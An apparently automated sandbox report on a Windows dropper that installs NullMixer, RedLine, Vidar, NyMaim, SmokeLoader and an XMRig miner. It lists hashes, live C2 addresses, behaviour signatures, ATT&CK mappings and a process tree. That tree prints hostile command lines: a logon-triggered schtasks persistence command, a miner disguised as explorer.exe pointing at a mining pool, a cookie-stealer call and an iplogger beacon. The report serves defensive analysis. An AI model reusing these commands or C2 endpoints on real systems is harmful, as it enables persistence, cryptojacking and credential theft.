Analysis

  • max time kernel
    70s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    14-11-2022 09:44

General

  • Target

    08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe

  • Size

    3.8MB

  • MD5

    56fbb5d915ff47c20902b8927ba569a3

  • SHA1

    23aae060b278385144806e0c371af6c69b8e0158

  • SHA256

    08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1

  • SHA512

    8067445522ceff25c27caa0683019a0738658509c72f2600c56efe31fd57a0478b23489321132dba66c6826790b94a5cbe676181899a8211ea2aa31988eeaeb2

  • SSDEEP

    98304:JMdlMnIffWtaW1gBLuoitV6HxvT5DsimPSveqa:JMdiIXYaWYktVexv1Dveqa

Malware Config

Extracted

Family

nullmixer

C2

http://sokiran.xyz/

Extracted

Family

vidar

Version

39.7

Botnet

933

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

redline

Botnet

Build2

C2

45.142.213.135:30059

Extracted

Family

nymaim

C2

45.139.105.171

85.31.46.167

Signatures

  • Detect Fabookie payload 5 IoCs
  • Detects Smokeloader packer 1 IoCs
  • Fabookie

    Fabookie is facebook account info stealer.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs
  • NullMixer

    NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.

  • NyMaim

    NyMaim is a malware with various capabilities written in C++ and first seen in 2013.

  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Nirsoft 3 IoCs
  • Vidar Stealer 3 IoCs
  • XMRig Miner payload 5 IoCs
  • ASPack v2.12-2.42 14 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 22 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 3 IoCs
  • Drops Chrome extension 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 29 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 61 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:884
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Modifies registry class
        PID:1964
    • C:\Users\Admin\AppData\Local\Temp\08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe
      "C:\Users\Admin\AppData\Local\Temp\08c672cbfc638f1cde4a502afb6b0b907b0a665a6b487a9552cbf48abcb516a1.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:288
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1724
        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\setup_install.exe"
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:956
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_1.exe
            4⤵
            • Loads dropped DLL
            PID:560
            • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_1.exe
              sonia_1.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:840
              • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_1.exe
                "C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_1.exe" -a
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                PID:1756
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_2.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1556
            • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_2.exe
              sonia_2.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks SCSI registry key(s)
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              PID:596
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_3.exe
            4⤵
            • Loads dropped DLL
            PID:1140
            • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_3.exe
              sonia_3.exe
              5⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Modifies system certificate store
              PID:472
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_4.exe
            4⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1672
            • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_4.exe
              sonia_4.exe
              5⤵
              • Executes dropped EXE
              • Modifies system certificate store
              • Suspicious use of AdjustPrivilegeToken
              PID:1792
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_5.exe
            4⤵
            • Loads dropped DLL
            PID:1448
            • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_5.exe
              sonia_5.exe
              5⤵
              • Executes dropped EXE
              • Suspicious use of AdjustPrivilegeToken
              PID:1624
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sonia_6.exe
            4⤵
            • Loads dropped DLL
            PID:1504
            • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_6.exe
              sonia_6.exe
              5⤵
              • Modifies Windows Defender Real-time Protection settings
              • Executes dropped EXE
              • Checks computer location settings
              • Loads dropped DLL
              • Drops Chrome extension
              • Suspicious behavior: EnumeratesProcesses
              PID:1936
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe"
                6⤵
                  PID:2136
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef20d4f50,0x7fef20d4f60,0x7fef20d4f70
                    7⤵
                      PID:2168
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1028 /prefetch:2
                      7⤵
                        PID:2464
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1344 /prefetch:8
                        7⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:1968
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1700 /prefetch:8
                        7⤵
                          PID:316
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2052 /prefetch:1
                          7⤵
                            PID:2820
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2016 /prefetch:1
                            7⤵
                              PID:2696
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=swiftshader-webgl --mojo-platform-channel-handle=1332 /prefetch:2
                              7⤵
                                PID:2336
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1012,8651802487186140568,6301431754220899054,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3028 /prefetch:8
                                7⤵
                                  PID:2944
                              • C:\Users\Admin\Documents\8E3LfnYPXV2LYzGy8ujarLjg.exe
                                "C:\Users\Admin\Documents\8E3LfnYPXV2LYzGy8ujarLjg.exe"
                                6⤵
                                  PID:2688
                                • C:\Users\Admin\Documents\ta1ITygLrtQYnMrfyyNqYjjf.exe
                                  "C:\Users\Admin\Documents\ta1ITygLrtQYnMrfyyNqYjjf.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  PID:2672
                                  • C:\Users\Admin\AppData\Local\Temp\is-MBDAA.tmp\is-G9LCH.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-MBDAA.tmp\is-G9LCH.tmp" /SL4 $20224 "C:\Users\Admin\Documents\ta1ITygLrtQYnMrfyyNqYjjf.exe" 1905553 52736
                                    7⤵
                                      PID:3012
                                      • C:\Program Files (x86)\gjSearcher\gjsearcher79.exe
                                        "C:\Program Files (x86)\gjSearcher\gjsearcher79.exe"
                                        8⤵
                                          PID:2908
                                    • C:\Users\Admin\Documents\73VV1VrGWv9MaXkWPyl0hQMT.exe
                                      "C:\Users\Admin\Documents\73VV1VrGWv9MaXkWPyl0hQMT.exe"
                                      6⤵
                                        PID:584
                                      • C:\Users\Admin\Documents\9mkblMHzEssEQ4tLoT6AR0rm.exe
                                        "C:\Users\Admin\Documents\9mkblMHzEssEQ4tLoT6AR0rm.exe"
                                        6⤵
                                          PID:3016
                                          • C:\Windows\SysWOW64\control.exe
                                            "C:\Windows\System32\control.exe" .\CnO1e6XZ.j
                                            7⤵
                                              PID:2348
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_7.exe
                                        4⤵
                                        • Loads dropped DLL
                                        PID:1444
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_7.exe
                                          sonia_7.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          • Adds Run key to start application
                                          PID:1708
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            PID:2088
                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            PID:2668
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c sonia_8.exe
                                        4⤵
                                        • Loads dropped DLL
                                        PID:556
                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_8.exe
                                          sonia_8.exe
                                          5⤵
                                          • Executes dropped EXE
                                          • Loads dropped DLL
                                          PID:1788
                                          • C:\Users\Admin\AppData\Local\Temp\Chrome2.exe
                                            "C:\Users\Admin\AppData\Local\Temp\Chrome2.exe"
                                            6⤵
                                            • Executes dropped EXE
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1572
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                                              7⤵
                                                PID:2380
                                                • C:\Windows\system32\schtasks.exe
                                                  schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                                                  8⤵
                                                  • Creates scheduled task(s)
                                                  PID:2416
                                              • C:\Users\Admin\AppData\Roaming\system64.exe
                                                "C:\Users\Admin\AppData\Roaming\system64.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                • Modifies system certificate store
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2456
                                                • C:\Windows\System32\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"' & exit
                                                  8⤵
                                                    PID:2716
                                                    • C:\Windows\system32\schtasks.exe
                                                      schtasks /create /f /sc onlogon /rl highest /tn "system64" /tr '"C:\Users\Admin\AppData\Roaming\system64.exe"'
                                                      9⤵
                                                      • Creates scheduled task(s)
                                                      PID:2748
                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                    8⤵
                                                    • Executes dropped EXE
                                                    PID:2760
                                                  • C:\Windows\explorer.exe
                                                    C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr.pool.minergate.com:45700 --user=sadikmalik1@gmail.com --pass= --cpu-max-threads-hint=80
                                                    8⤵
                                                      PID:2984
                                                • C:\Users\Admin\AppData\Local\Temp\Install2.EXE
                                                  "C:\Users\Admin\AppData\Local\Temp\Install2.EXE"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Adds Run key to start application
                                                  PID:1740
                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Suspicious use of SetThreadContext
                                                    PID:1688
                                                    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                                                      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BIRZAC~1.EXE
                                                      8⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1900
                                                  • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
                                                    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD2~1.EXE
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:2172
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS2109.tmp\Install.cmd" "
                                                      8⤵
                                                        PID:2220
                                                        • C:\Program Files\Internet Explorer\iexplore.exe
                                                          "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1Df2r7
                                                          9⤵
                                                          • Modifies Internet Explorer settings
                                                          • Suspicious use of FindShellTrayWindow
                                                          • Suspicious use of SetWindowsHookEx
                                                          PID:2260
                                                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                                                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2260 CREDAT:275457 /prefetch:2
                                                            10⤵
                                                            • Modifies Internet Explorer settings
                                                            • Suspicious use of SetWindowsHookEx
                                                            PID:2312
                                                  • C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\P1GlorySetp.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1908
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 956 -s 420
                                                4⤵
                                                • Loads dropped DLL
                                                • Program crash
                                                PID:2036
                                        • C:\Windows\system32\rUNdlL32.eXe
                                          rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                          1⤵
                                          • Process spawned unexpected child process
                                          PID:672
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                            2⤵
                                            • Loads dropped DLL
                                            • Modifies registry class
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1584

                                        Network

                                        MITRE ATT&CK Matrix ATT&CK v6

                                        Execution

                                        Scheduled Task

                                        1
                                        T1053

                                        Persistence

                                        Modify Existing Service

                                        1
                                        T1031

                                        Registry Run Keys / Startup Folder

                                        1
                                        T1060

                                        Scheduled Task

                                        1
                                        T1053

                                        Privilege Escalation

                                        Scheduled Task

                                        1
                                        T1053

                                        Defense Evasion

                                        Modify Registry

                                        4
                                        T1112

                                        Disabling Security Tools

                                        1
                                        T1089

                                        Install Root Certificate

                                        1
                                        T1130

                                        Credential Access

                                        Credentials in Files

                                        1
                                        T1081

                                        Discovery

                                        Query Registry

                                        2
                                        T1012

                                        System Information Discovery

                                        3
                                        T1082

                                        Peripheral Device Discovery

                                        1
                                        T1120

                                        Collection

                                        Data from Local System

                                        1
                                        T1005

                                        Command and Control

                                        Web Service

                                        1
                                        T1102

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\libcurl.dll
                                          Filesize

                                          218KB

                                          MD5

                                          d09be1f47fd6b827c81a4812b4f7296f

                                          SHA1

                                          028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                          SHA256

                                          0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                          SHA512

                                          857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\libcurlpp.dll
                                          Filesize

                                          54KB

                                          MD5

                                          e6e578373c2e416289a8da55f1dc5e8e

                                          SHA1

                                          b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                          SHA256

                                          43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                          SHA512

                                          9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\libgcc_s_dw2-1.dll
                                          Filesize

                                          113KB

                                          MD5

                                          9aec524b616618b0d3d00b27b6f51da1

                                          SHA1

                                          64264300801a353db324d11738ffed876550e1d3

                                          SHA256

                                          59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                          SHA512

                                          0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\libstdc++-6.dll
                                          Filesize

                                          647KB

                                          MD5

                                          5e279950775baae5fea04d2cc4526bcc

                                          SHA1

                                          8aef1e10031c3629512c43dd8b0b5d9060878453

                                          SHA256

                                          97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                          SHA512

                                          666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\libwinpthread-1.dll
                                          Filesize

                                          69KB

                                          MD5

                                          1e0d62c34ff2e649ebc5c372065732ee

                                          SHA1

                                          fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                          SHA256

                                          509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                          SHA512

                                          3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\setup_install.exe
                                          Filesize

                                          290KB

                                          MD5

                                          b1b08befa4d0b60d8cf636ef7fa77779

                                          SHA1

                                          45c2bbd6af057098d1d1e4c925daa7c353ed024c

                                          SHA256

                                          08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a

                                          SHA512

                                          e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\setup_install.exe
                                          Filesize

                                          290KB

                                          MD5

                                          b1b08befa4d0b60d8cf636ef7fa77779

                                          SHA1

                                          45c2bbd6af057098d1d1e4c925daa7c353ed024c

                                          SHA256

                                          08e6949bd92997ec51e4e87f2e320d9f2816567a72e3666d83d0a3e4f942ce1a

                                          SHA512

                                          e4af4a67ff39008e16cf0e781d327ce22d35555605da42e554ddfb377ffa0a17edc011284e310b16730025e0034ac453ef7b8354a21a5f8ab5d285bf4b4029e3

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_1.exe
                                          Filesize

                                          712KB

                                          MD5

                                          6e43430011784cff369ea5a5ae4b000f

                                          SHA1

                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                          SHA256

                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                          SHA512

                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_1.txt
                                          Filesize

                                          712KB

                                          MD5

                                          6e43430011784cff369ea5a5ae4b000f

                                          SHA1

                                          5999859a9ddfcc66e41ff301b0eeb92ef0ce5b9f

                                          SHA256

                                          a5ab29e6fc308d1fe9fd056e960d7ccd474e2d22fb6a799d07086ec715a89d9a

                                          SHA512

                                          33ef732056182b9ab073d2eacfd71d3f1cb969ee038a19336fb5e0263a4e870742082c756a57010a26e7eab747a2332523d638f2570b8070b933bf957d2dea96

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_2.exe
                                          Filesize

                                          150KB

                                          MD5

                                          9f569d0eae949d683725de7bbe893eb8

                                          SHA1

                                          e4696b870a5a9d06585df259e8ee80f4b2364823

                                          SHA256

                                          273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a

                                          SHA512

                                          94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_2.txt
                                          Filesize

                                          150KB

                                          MD5

                                          9f569d0eae949d683725de7bbe893eb8

                                          SHA1

                                          e4696b870a5a9d06585df259e8ee80f4b2364823

                                          SHA256

                                          273fb2e46f46a189e896064ce7213f2805dc0aff361eb997d59ccd903f1e9e8a

                                          SHA512

                                          94264d5969ea49d2a4e1bda9f0456ac430f1ae727f60cad883c7c24d1965a58b10e6d6901133a61dd2faa4701677d50abba71762ba7529c15f5046e5e3d69170

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_3.exe
                                          Filesize

                                          516KB

                                          MD5

                                          7c42c04a6e95c6b494018be20ef811dc

                                          SHA1

                                          126d1bce056ae6ba2cea63815f6465450a1a6339

                                          SHA256

                                          f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69

                                          SHA512

                                          2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_3.txt
                                          Filesize

                                          516KB

                                          MD5

                                          7c42c04a6e95c6b494018be20ef811dc

                                          SHA1

                                          126d1bce056ae6ba2cea63815f6465450a1a6339

                                          SHA256

                                          f5d5b68ad033335a06f341b7968209734cae7487ac80a3646843762bd1147e69

                                          SHA512

                                          2334784119ccf315d38e8d02aa4752b0e5b9243750df0f8f0fc492bc1b617fadd871a23d57d536c2bcf593e8d683b4f2567b316cc43db0061d9bba7014f2f317

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_4.exe
                                          Filesize

                                          8KB

                                          MD5

                                          aebba1a56e0d716d2e4b6676888084c8

                                          SHA1

                                          fb0fc0de54c2f740deb8323272ff0180e4b89d99

                                          SHA256

                                          6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b

                                          SHA512

                                          914fbff3f840d7dbde470514c9f8916112bbccce4f427b84c395c870b7194b3f6f453f583fc1081c6e896e3af3b89d5fdf0999a9a766e41a8f0448e6f06e6b62

                                        • C:\Users\Admin\AppData\Local\Temp\7zSCB6E04FB\sonia_4.txt
                                          Filesize

                                          8KB

                                          MD5

                                          aebba1a56e0d716d2e4b6676888084c8

                                          SHA1

                                          fb0fc0de54c2f740deb8323272ff0180e4b89d99

                                          SHA256

                                          6529c1eb48d6a4ffe24e91bb65cab349436408048d403edf9fcfa38ac617d38b

                                          SHA512

